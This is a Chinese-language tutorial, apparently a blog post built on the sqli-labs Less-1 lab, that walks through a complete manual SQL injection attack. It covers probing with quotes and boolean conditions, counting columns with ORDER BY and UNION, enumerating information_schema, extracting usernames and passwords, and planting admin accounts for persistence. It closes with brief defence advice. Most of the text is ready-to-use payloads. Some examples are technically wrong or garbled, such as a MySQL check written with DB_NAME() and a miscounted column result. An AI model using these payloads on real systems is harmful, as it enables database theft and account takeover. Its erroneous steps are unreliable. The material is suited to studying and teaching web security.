完整的sql注入公鸡流程

sql注入完整流程_数据库

判断是否能够sql注入

要判断一个网站或应用程序是否容易受到SQL注入公鸡,可以尝试在输入框中输入一些特殊字符或SQL语句片段,看看系统的响应。如果系统对这些输入做了过滤或者进行了正确的参数化处理,那么很可能是安全的。但如果系统对这些输入没有进行处理,直接将其拼接到SQL查询语句中,那么就存在SQL注入的风险。

以下是一些常见的SQL注入检测技巧:

  1. 输入单引号(')或双引号("):输入一个单引号或双引号,看看系统是否报错,如果系统返回SQL错误信息,可能存在SQL注入漏洞。
  2. 输入SQL保留关键字:尝试输入SQL的保留关键字如SELECT、INSERT、UPDATE等,观察系统的响应。
  3. 输入注释符号(-- 或 #):输入"--"或"#",看看系统是否会忽略之后的内容。
  4. 输入布尔条件:尝试使用布尔条件来判断数据库查询的结果,比如输入1=1、1=2等,看看系统的响应是否有差异。
  5. 输入UNION语句:尝试构造一个UNION语句,将两个查询结果合并,观察系统的响应是否有变化。

下面是一个示例,假设有一个登录功能,用户需要输入用户名和密码进行登录:

SELECT * FROM users WHERE username = '输入的用户名' AND password = '输入的密码'

如果应用程序没有对用户输入进行验证和过滤,公鸡者可以通过输入恶意的用户名和密码来进行SQL注入公鸡。例如,公鸡者可以输入 ' OR '1'='1 作为用户名和密码,那么最终的SQL语句将变成:

SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '' OR '1'='1'

这样就绕过了原本的用户名和密码验证,返回了所有用户的信息。

请注意,进行SQL注入测试时必须遵守法律法规,并且只能在授权范围内进行。未经授权的SQL注入测试属于违法行为,可能会导致法律责任。

sql注入完整流程_字段_02

在重放页面里,点击右键可以讲输入的URL加密

判断表中有几个字段

下面是一个示例,展示如何通过SQL注入漏洞手工判断数据表中的字段数量:

假设有一个存在SQL注入漏洞的查询页面,用户输入的参数被直接拼接到SQL查询语句中。例如:

SELECT * FROM products WHERE id = '$user_input';

公鸡者可以尝试利用注入漏洞,构造如下的恶意输入:

1' UNION SELECT 1,2,3--

在这个恶意输入中,1'是为了闭合原始查询语句中的单引号,UNION SELECT 1,2,3-- 是为了在原始查询的结果集中添加一个额外的结果集,其中包含3个任意值。-- 是 SQL 中的注释符号,用于注释掉原始查询语句后面的部分。

如果应用程序对用户输入的值没有进行充分的过滤和验证,那么公鸡者构造的恶意输入可能会成功执行,并且返回一个包含4列的结果集。这样,公鸡者就可以推断出数据表中有4个字段。

sql注入完整流程_SQL_03

检查1.2.3都是查什么字段

sql注入完整流程_字段_04

查询数据库


sql注入完整流程_字段_05

在手工进行SQL注入测试时,可以通过以下方法确定当前正在使用的数据库名:

  1. 使用特定的函数获取数据库名。不同的数据库管理系统可能有不同的函数来获取当前数据库名。例如,在MySQL中,可以使用database()函数来获取当前数据库名。

示例:


' UNION SELECT database(), 2 -- -


  1. 通过联合查询注入的方式尝试获取当前数据库名。可以尝试将一个已知的数据库名与当前数据库名进行比较,如果相等,则说明找到了正确的数据库名。

示例:


' UNION SELECT 'known_db', database() -- -

请注意,这些方法仅适用于手工进行SQL注入测试,并且需要根据具体的数据库管理系统和环境进行调整。在进行实际的SQL注入测试时,请确保遵循法律和道德规范。必须在有授权的情况下进行测试。

sql注入完整流程_字段_06

手工SQL注入可以用来查询数据库的库名。以下是一个示例:

  1. 假设有一个登录页面,用户需要输入用户名和密码。后端代码可能如下:
python复制代码运行
import pymysql

def login(username, password):
    db = pymysql.connect("localhost", "root", "password", "test_db")
    cursor = db.cursor()
    sql = "SELECT * FROM users WHERE username='%s' AND password='%s'" % (username, password)
    cursor.execute(sql)
    results = cursor.fetchall()
    return len(results) > 0
  1. 手工SQL注入公鸡:在用户名或密码输入框中输入以下内容:
admin' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100 -- '
  1. 当后端执行SQL查询时,实际执行的SQL语句为:
SELECT * FROM users WHERE username='admin' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100 -- '

由于UNION操作符可以将两个或多个SELECT语句的结果合并成一个结果集,所以这个查询将返回所有用户记录,而不仅仅是具有指定用户名和密码的用户。公鸡者可以通过这种方式获取数据库中的其他用户信息。

如果遇到当前数据库名称不是常见的数据库名称的话可以参照一下方法进行

  1. 首先,尝试使用常见的数据库名称(如mysqlinformation_schema等)进行测试。这可能会帮助您快速确定数据库类型。
  2. 如果这些常见的数据库名称不起作用,您可以尝试使用特定于您怀疑正在使用的数据库的盲注技术。例如,如果您怀疑目标网站使用了MySQL,可以使用以下查询进行测试:
SELECT IF(DB_NAME() = 'your_database_name', 1, 0);

your_database_name替换为您要测试的数据库名称。如果应用程序返回1,则表示数据库名称正确;如果返回0,则表示数据库名称不正确。

  1. 重复第2步,测试不同的数据库名称,直到找到正确的名称。

请注意,SQL注入测试可能涉及非法活动,因此请确保在进行此类测试时获得适当的授权。

获取指定表的所有字段

sql注入完整流程_数据库_07

手工SQL注入测试中,获取指定表的所有字段通常涉及利用SQL注入漏洞向目标网站或应用程序提交精心构造的查询,以探查数据库结构而不依赖于常规的SQL管理工具。这种方法往往涉及到对数据库响应的观察和分析,以及逐步递增的试探性查询。以下是几种常见的手工获取指定表所有字段的方法:

方法1:使用ORDER BY语句

原理: 通过向查询语句添加ORDER BY子句,并逐步递增排序字段的编号,观察返回结果或服务器响应的变化。当尝试的字段编号超过实际存在的最大字段数时,数据库通常会返回错误或异常行为,从而帮助确定表的字段数量。

示例: 假设公鸡者发现URL参数id=1被用于如下SQL查询:

1SELECT * FROM users WHERE id = 1;

公鸡者可以通过注入ORDER BY子句来测试字段数:

1http://example.com/users?id=1 ORDER BY 1 --+
2http://example.com/users?id=1 ORDER BY 2 --+
3...
4http://example.com/users?id=1 ORDER BY N --+

每当N超出实际字段数时,预期会出现错误或异常响应。通过这种方法可以确定表users的最大字段数。

方法2:利用UNION SELECT结合枚举

原理: 如果目标查询允许UNION操作,公鸡者可以尝试构建包含假数据的额外结果集,其中每一行代表一个可能的字段名。通过不断尝试添加新的UNION SELECT项,直到出现错误或响应异常,可以确定表的字段数。进一步,通过猜测或利用数据库特定的信息(如系统表、内建函数等),尝试填充字段值以揭示字段名。

示例: 假设公鸡者已经确定了表usersN个字段,他们可以尝试如下查询:

1http://example.com/users?id=-1 UNION SELECT 'Field1', 'Field2', ..., 'FieldN' --+

其中,Field1Field2, ..., FieldN 是公鸡者猜测的字段名。如果猜测正确,这些字段名可能会在响应中显示出来,或者对响应内容产生可察觉的影响。通过反复调整猜测的字段名,可以逐渐揭示实际的字段名。

方法3:利用注释后跟错误触发语句

原理: 在某些情况下,即使无法直接利用ORDER BYUNION,公鸡者也可能通过注入特定的错误触发语句,如EXISTS(SELECT * FROM unknown_table),并在其后添加注释来闭合原查询的语句结构。当错误触发语句被执行且注释正确闭合原查询时,数据库会返回错误消息,其中可能包含有关表结构的有用信息,包括字段名。

示例: 假设公鸡者面对如下查询:

1SELECT * FROM users WHERE username = 'admin' AND password = 'password';

他们可以注入如下内容:

1' OR 1=1 /*' + EXISTS(SELECT * FROM unknown_table) + */

当数据库执行此查询并遇到错误时,返回的错误消息可能包含有关未知表的字段信息,间接帮助公鸡者了解目标表的字段情况。

注意事项:

  1. 合法性与风险:以上方法均为非法入侵行为,严重违反网络安全法规。任何未经授权的SQL注入测试均属犯罪,可能导致法律责任。仅在得到明确授权且在合法的安全测试环境中进行此类操作。
  2. 环境特定:不同的数据库系统、应用程序设置及错误处理机制会对上述方法的效果产生影响。实际操作中可能需要根据目标系统的特性进行调整。
  3. 防御措施:防止SQL注入的最佳做法是始终对用户输入进行严格的验证、净化和参数化查询的使用,确保应用程序代码遵循安全编码原则。

sql注入完整流程_数据库_08

图片语句中的语句解析:

让我们逐步解析这个SQL注入语句:

GET /Less-1/?id=:这是HTTP GET请求的一部分,请求的是一个名为"Less-1"的资源,查询参数"id"没有被设置。

1' and '1'='2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--:这是注入的SQL代码。

1' and '1'='2:这部分是一个始终为假的条件,目的是让原始查询失败。如果原始查询依赖于"id"参数的值来决定是否执行某些操作,那么这个条件会使它不执行。

union select 1,group_concat(column_name),3:UNION用于合并两个或更多的SELECT语句的结果集。这里,我们选择了一个数字1,然后使用GROUP_CONCAT函数将column_name列的所有值连接成一个字符串,最后选择了一个数字3。这表明公鸡者试图获取表users的所有列名。

from information_schema.columns where table_schema='security' and table_name='users':这部分是SQL查询的主体,它从information_schema.columns表中选择数据,该表存储了数据库中所有表的列信息。公鸡者在这里过滤出security数据库中的users表的所有列名。

--:这是注释符号,用于注释掉后面的内容,防止它们影响到注入的SQL语句。

综上所述,这个HTTP请求是一个SQL注入公鸡,公鸡者试图通过获取security数据库中users表的所有列名来获取敏感信息。

获取指定表中的指定字段

在手工进行SQL注入测试时,可以通过以下流程获取指定表中的指定两个字段:

  1. 确定数据库名和表名。首先,需要知道目标数据库的名称和要查询的表的名称。这可以通过使用特定的函数或通过联合查询注入的方式获取。
  2. 获取指定表的所有列名。可以使用前面提到的方法之一来获取指定表的所有列名。
  3. 逐个尝试获取指定字段的值。根据已知的列名,可以逐个尝试获取指定字段的值。例如,如果目标字段是usernamepassword,则可以尝试以下注入语句:
' UNION SELECT 'username', 'password' FROM your_table_name -- -

验证结果。如果返回的结果中包含目标字段的值,则说明成功获取了这两个字段的值。

小题

假设我们有一个Web应用程序,其中有一个搜索功能,允许用户输入关键词来搜索数据库中的记录。搜索功能的URL如下:

http://example.com/search.php?keyword=some+keyword

在这个例子中,我们假设搜索功能存在SQL注入漏洞,我们可以利用这个漏洞来执行恶意SQL查询。为了简化示例,我们假设数据库名为testdb,表名为users,我们想要获取users表中的username字段。

首先,我们需要确定数据库的类型。例如,我们可以尝试使用以下查询:

SELECT 1 FROM information_schema.tables WHERE table_name = 'users' LIMIT 1;

如果上述查询能够返回结果,那么我们可以确定数据库类型为MySQL。接下来,我们可以尝试获取users表的列名,例如:

SELECT column_name FROM information_schema.columns WHERE table_name = 'users';

假设我们已经知道username字段存在于users表中,接下来我们可以尝试获取该字段的数据。我们可以使用以下查询来获取username字段的值:

SELECT username FROM users;

然而,由于可能存在多个记录,我们可能需要进一步筛选结果。为此,我们可以使用以下查询来获取第一条记录的username字段值:

SELECT username FROM users LIMIT 1;

分析语句

或者分析一下下面图片中的sql语句

sql注入完整流程_字段_09

让我们逐步解析这个SQL注入语句:

GET /Less-1/?id=:这是HTTP GET请求的一部分,请求的是一个名为"Less-1"的资源,查询参数"id"没有被设置。

1' and '1'='2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--:这是注入的SQL代码。

1' and '1'='2:这部分是一个始终为假的条件,目的是让原始查询失败。如果原始查询依赖于"id"参数的值来决定是否执行某些操作,那么这个条件会使它不执行。

union select 1,group_concat(column_name),3:UNION用于合并两个或更多的SELECT语句的结果集。这里,我们选择了一个数字1,然后使用GROUP_CONCAT函数将column_name列的所有值连接成一个字符串,最后选择了一个数字3。这表明公鸡者试图获取表users的所有列名。

from information_schema.columns where table_schema='security' and table_name='users':这部分是SQL查询的主体,它从information_schema.columns表中选择数据,该表存储了数据库中所有表的列信息。公鸡者在这里过滤出security数据库中的users表的所有列名。

--:这是注释符号,用于注释掉后面的内容,防止它们影响到注入的SQL语句。

综上所述,这个HTTP请求是一个SQL注入公鸡,公鸡者试图通过获取security数据库中users表的所有列名来获取敏感信息。

总结

sql注入完整流程_数据库_10

SQL注入完整流程的技术重点总结及示例:

  1. 公鸡目标识别

示例:公鸡者发现一个在线购物网站的搜索功能,输入框允许用户输入商品名称进行搜索。

2. 漏洞探测

示例:公鸡者在搜索框输入 ' (单引号),观察应用程序是否返回错误信息或异常行为。如果出现“语法错误”、“查询失败”等提示,可能表明应用程序未对用户输入进行有效过滤,存在SQL注入风险。

3. Payload构造

示例

  • 终止语句注入:输入 ' OR '1'='1,尝试绕过条件判断。假设原始查询类似 SELECT * FROM products WHERE name = '用户输入',注入后变为 SELECT * FROM products WHERE name = '' OR '1'='1',查询结果始终为真,显示所有产品。
  • 布尔型盲注:输入 ' AND (SELECT COUNT(*) FROM users)>0,如果应用程序返回不同结果(如搜索结果数量变化或页面加载时间延长),则可能表明存在盲注漏洞,并且能够与数据库交互。

4. Payload注入

示例:公鸡者将上述payload直接输入到搜索框中,提交给应用程序。

5. 信息收集与权限提升

示例

  • 数据库枚举:通过注入语句 SELECT database() 获取当前数据库名;使用 UNION SELECT column_name FROM information_schema.columns WHERE table_name='users' 枚举用户表中的列名。
  • 数据泄露:注入 SELECT username, password FROM users WHERE id=1,尝试获取特定用户(如管理员)的账户信息。

6. 深度渗头与持久化

示例

  • 提权:若获取到管理员凭证,公鸡者可尝试登录管理后台,进一步操作数据或更改系统设置。
  • 持久化:在用户表中插入新的管理员账户,或者修改现有账户的密码和权限,确保即使漏洞被修复也能持续访问。

7. 防御与检测

示例

  • 预防:应用程序使用参数化查询(如PDO、PreparedStatement),确保用户输入与SQL语句分离,如 SELECT * FROM products WHERE name = ?,参数由外部传入,避免直接拼接。
  • 检测:部署WAF(Web Application Firewall)或IDS/IPS(Intrusion Detection/Prevention System),配置规则监测并阻止常见的SQL注入payload;定期进行安全审计和漏洞扫描,及时发现并修复潜在问题。